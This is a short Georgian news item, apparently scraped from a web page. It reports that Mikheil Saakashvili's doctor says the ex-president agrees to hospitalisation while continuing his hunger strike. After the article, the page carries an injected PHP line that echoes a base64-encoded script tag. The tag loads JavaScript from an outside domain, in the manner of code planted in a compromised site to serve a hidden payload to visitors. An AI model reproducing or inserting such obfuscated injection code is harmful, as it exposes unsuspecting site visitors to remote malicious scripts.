celsiusi
ავერსი შნაიდერი
მიხეილ სააკაშვილის პირადმა ექიმმა, ნიკოლოზ ყიფშიძემ რუსთავის N12 პენიტენციური დაწესებულება დატოვა.
 
მისი თქმით, მიხეილ სააკაშვილი თანახმაა მოხდეს მისი ჰოსპიტალიზაცია, თუმცა ექსპრეზიდენტი შიმშილობის შეწყვეტას არ აპირებს.
 
"მიხეილ სააკაშვილი მზადაა გადავიდეს ჰოსპიტალში. ეს რასაკვირველია დღეს და ხვალ არ მოხდება. შაბათ-კვირას ან არ ვიცი, როდის იქნება. კიდე გასავლელია რაღაც პატარა საკითხები ჯანდაცვის და იუსტიციის სამინისტროსთან, ამას გავარკვევ ყველაფერს ხვალ-ზეგ.
 
ჰოსპიტალიზაცია არ ნიშნავს, რომ პრეზიდენტი აღარ შიმშილობს, არავითარ შემთხვევაში. ის შიმშილობას აგრძელებს. შეწყვეტაზე ლაპარაკიც ზედმეტია.
 
მისი ანალიზები გავიარე. რაღაც უკეთესია, რაღაც უარესია", - განაცხადა ნიკოლოზ ყიფშიძემ.
979
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");